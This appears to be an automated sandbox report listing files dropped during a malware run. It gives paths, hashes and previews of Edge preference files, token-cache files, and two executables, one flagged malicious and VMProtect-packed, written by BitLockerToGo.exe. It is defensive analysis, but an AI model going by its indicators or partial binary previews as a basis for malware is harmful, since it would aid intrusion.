                                                                                                                                                                                                                                                                                                                                                        SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a9d24831-fe47-45d2-ad43-45637bf0e963.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):44604
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0965305519764375
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBwwukhDO6vP6OWeKDXTaJFPm0cGoup1Xl3jVzXr4z:z/Ps+wsI7ynEU67chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                                        MD5:DFCA891CCB3089E4FB5BF3BCF3BD469A
                                                                                                                                                                                                                                                                                                                                                        SHA1:FD7EA6A40FC1C11968756BFF49BD4D29CE90F610
                                                                                                                                                                                                                                                                                                                                                        SHA-256:A7C06659739D9289EA1801A1D9B82B1CC2926F5AD62D8E24C71F36EC601532CA
                                                                                                                                                                                                                                                                                                                                                        SHA-512:CD2E0F3959173A6A23EFEC6F88FD854D5737F9C0C24E7839724B2975F397799FCC7F74FA8B5F4DFB1F3E721920C057DCB1390CACD2BDD29048B0575B1576F644
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\b6cacea0-dafb-48fd-a850-eed621f4a84f.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):45680
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.088247304093352
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:mMkbJrT8IeQcrQgx9ro2uBhDO6vP6OWeCh5EEvhyaAsImE0hKqX7KCAoVGoup1Xe:mMk1rT8HR9rf69sIahfX7KRoVhu3VlXS
                                                                                                                                                                                                                                                                                                                                                        MD5:408FCBE7C5636A160196328842C1D551
                                                                                                                                                                                                                                                                                                                                                        SHA1:11485381A0263BCE6065E960573F9E2BD08729E3
                                                                                                                                                                                                                                                                                                                                                        SHA-256:B33226CBF7871FB454B5F164075C861B94A86E559A56CFBD73EE0401000A6718
                                                                                                                                                                                                                                                                                                                                                        SHA-512:7DC86B6AA12ADA2F0DC2899367ECDC69382FE7B270FC7DBD34B9C744EAFED639B1773C19B6E63F7368A9DDFFA02AEB4B7CC54FA591F9D20DAB39D85BDE0E5AFD
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c19cd94c-769c-4993-97cc-1341259597e0.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):45804
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0880154808559555
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:mMkbJrT8IeQcrQgc9rs2uBhDO6vP6OWeih5EEvhyaAsImE0hKqX7KCAoVGoup1Xe:mMk1rT8H89r76xsIahfX7KRoVhu3VlXS
                                                                                                                                                                                                                                                                                                                                                        MD5:65C4A617FD037ACE0A82801AE8B8B14F
                                                                                                                                                                                                                                                                                                                                                        SHA1:490D48EDFB0E570D1C2FA68B32F4BF7EE099FBB4
                                                                                                                                                                                                                                                                                                                                                        SHA-256:FEFE04A589CB1DAF3A0FA23302F00E336F391A1BEAFA201D9DF63B5EF4B0F6F2
                                                                                                                                                                                                                                                                                                                                                        SHA-512:06328212F17712BE001D47070AE9070E8612197D48611C6C8998AA91631A3F319B3F2E8A7162B530E0B1C3BE9007DC2D2189449AB701F22A196BD38FF1100D6F
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\fc1da110-48f9-431a-bfa4-ec469ab07d5c.tmp

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):44604
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0965305519764375
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBwwukhDO6vP6OWeKDXTaJFPm0cGoup1Xl3jVzXr4z:z/Ps+wsI7ynEU67chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                                        MD5:DFCA891CCB3089E4FB5BF3BCF3BD469A
                                                                                                                                                                                                                                                                                                                                                        SHA1:FD7EA6A40FC1C11968756BFF49BD4D29CE90F610
                                                                                                                                                                                                                                                                                                                                                        SHA-256:A7C06659739D9289EA1801A1D9B82B1CC2926F5AD62D8E24C71F36EC601532CA
                                                                                                                                                                                                                                                                                                                                                        SHA-512:CD2E0F3959173A6A23EFEC6F88FD854D5737F9C0C24E7839724B2975F397799FCC7F74FA8B5F4DFB1F3E721920C057DCB1390CACD2BDD29048B0575B1576F644
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2278
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.8470226758576307
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:uiTrlKxrgxWxl9Il8uc7C0EU4LZMhatir7vv/4QSmd1rc:mHYm7C0E8Qirjv/s
                                                                                                                                                                                                                                                                                                                                                        MD5:BA7B8B4656BA9AADA6C2A7D002F41A9B
                                                                                                                                                                                                                                                                                                                                                        SHA1:B6F7A1BE5C3C1365F2FD4AF5653FF475CBEE2F8F
                                                                                                                                                                                                                                                                                                                                                        SHA-256:BA4A3FB3C143D8214331B7737EB44399BC22A7CDF1EC4B33C61C42A582A0DF1C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:65FF402AF8CDF1CC1E87B0F8F6E35032863A17FE3B205BDA2AB2C8533D64CA0C1D70B28E73FC3EC51EFD976EEFD4321A0076EC4C181107784390DC23A2627AC5
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.E.U.u.i.6.k.2.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.q.9.T.2.W.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4622
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.001976302007193
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:uiTrlKxExuxD9Il8u9P3E0HpqMNHiGYrsLuZWObX1Rx1u5I+p0ln8faEV+2cjkbI:kYz3E0JNrqsLEXvuW+pXayJ+iyZdT
                                                                                                                                                                                                                                                                                                                                                        MD5:E65D67351581D588FE00C9B53CB29674
                                                                                                                                                                                                                                                                                                                                                        SHA1:AFAC0C6DD0B16454504BE3480124A1212617F608
                                                                                                                                                                                                                                                                                                                                                        SHA-256:D6C77CD0D46F42276545F1018677F1F418E81C32B771296D60270618AF877E1D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:E1121CEC6EFC0B4E013721B4586416B3F0435BF34A7C3974DA61DB86B0BEDB95C6BAF4D2490CD9FC2F49A5121BA1D29336BCE048363EED10708F8DEBBC79E59C
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".q.F.w.i.c.a.E.2.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.q.9.T.2.W.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2684
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.8987831264215878
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:uiTrlKx68Wa7xjgxl9Il8u7arBaC0UWlgfZlzDI5W3jOKvvtDM7eH/8Xw+pXRedc:aeY89aC0UisBDIOjOK6aH/8phL
                                                                                                                                                                                                                                                                                                                                                        MD5:17E7C462D78B9191394B8CEBE20705D5
                                                                                                                                                                                                                                                                                                                                                        SHA1:6C5D84A713F4928A13F9BAE3AECD5378B8369129
                                                                                                                                                                                                                                                                                                                                                        SHA-256:EC408E5508A36484306564E162D37AFC61E314469E9700D00DB8E8D07D20400A
                                                                                                                                                                                                                                                                                                                                                        SHA-512:F3AB1D798317D12272DB480D7760ABA0CF30103A36849AAE0FE1DF4AAAC99D866BE9E2A92433AA6F1B091E92DA36568CF3F47A5B0448822617C0ECEFB3FBA03A
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".w.w.4.J.o.X.J.V.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.q.9.T.2.W.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\json[1].json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3500
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.395606886907037
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:6NnC6HC9NnC9MtbCKNnCw9CKNnCCvUdgECCwNnCoCmNnCNsvDCN+NnC/8TwCENnp:6NyNLNjNVvULwNxNzxNi8TGN0AOVy
                                                                                                                                                                                                                                                                                                                                                        MD5:91AE5006591C5BFF5F4CFAB490E1889D
                                                                                                                                                                                                                                                                                                                                                        SHA1:03275DC0CF7BACC4D7751CA6B3E9AB6745E30146
                                                                                                                                                                                                                                                                                                                                                        SHA-256:FE81C1B1D275DFE12C01AEE7F7A34F4DBF966AA9CC8A33030E328350AFD0B4F8
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B55F8AED0AC76D815C61CEA6B7B183550AFC8BD6CBC6786B19B02340603A4D7FBD3E86D8B3EA3F27BB5B82B238FBBDAE5B344D59C754654D8F9474E92204283D
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/C7E9E003B4D503B61409CFEF3CCFE2CC",.. "id": "C7E9E003B4D503B61409CFEF3CCFE2CC",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/C7E9E003B4D503B61409CFEF3CCFE2CC"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/5CB81B1CE872E1AAA27477CB72E81747",.. "id": "5CB81B1CE872E1AAA27477CB72E81747",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/5CB81B1CE872E1AAA27477CB72E81747"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\NewApp[1].exe

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):11695088
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.8917166271540635
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:196608:BEbYJP+JnMFs2AhO2uqRJar8hknJnMWT1wbPdLTM5aGeSHNy9Ohcs0aMKgk3LQ1:bJW9MshOXkaIKJnMwYoaVSHasNM4s1
                                                                                                                                                                                                                                                                                                                                                        MD5:FBBA09E1B1024A3E7B88D06B53AD3716
                                                                                                                                                                                                                                                                                                                                                        SHA1:258FBCDB22474274B21435AA3DA5F95023F363BD
                                                                                                                                                                                                                                                                                                                                                        SHA-256:9A58D77F6060DFBF514C5113BBC6381C128D16921B43A808D65BCC2DFDDEC408
                                                                                                                                                                                                                                                                                                                                                        SHA-512:DC43D6966A7C6B9E3ECF20703FC154C9400F1A5ED7F6EDD1A8C0D906CD526C184694D98E51DA165F73525095AF38BDCD8DFF1BF383687410068F8840A4CD66F5
                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....'g.........."......$....Q...............@..............................B..........`.................................................H...P....0A.l.....A.$....V....... A. ..............................(...P.A.8...........................................text....".......................... ..`.rdata..$2...@......................@..@.data.....O.........................@....pdata.......`Q.....................@..@.00cfg.......pQ.....................@..@.tls..........Q.....................@....vmp.$.>=...Q..................... ..`.vmp.$............................@....vmp.$.6.......8..................`..h.reloc.. .... A......B..............@..@.rsrc...l....0A......D..............@..@................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Updater[1].exe

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):5842928
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.890789729742247
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:kYq0KmyfpgVBH9rqADdgnILbQaPhgPqt0nw9pdfvBNTHuzD8vxFJN+L24Kc:tUpg3drqMSILbQAWPqt04phBNTOEvhIh
                                                                                                                                                                                                                                                                                                                                                        MD5:18F4B337AD6BEB8E7EE040BCC8C049DF
                                                                                                                                                                                                                                                                                                                                                        SHA1:641350458E08F2275A451239DC74A2F7681ADF4F
                                                                                                                                                                                                                                                                                                                                                        SHA-256:9B3607E5A2407E4A2875EA68340CF1724853031A39DD7FAA47A97C83B1B1F5E3
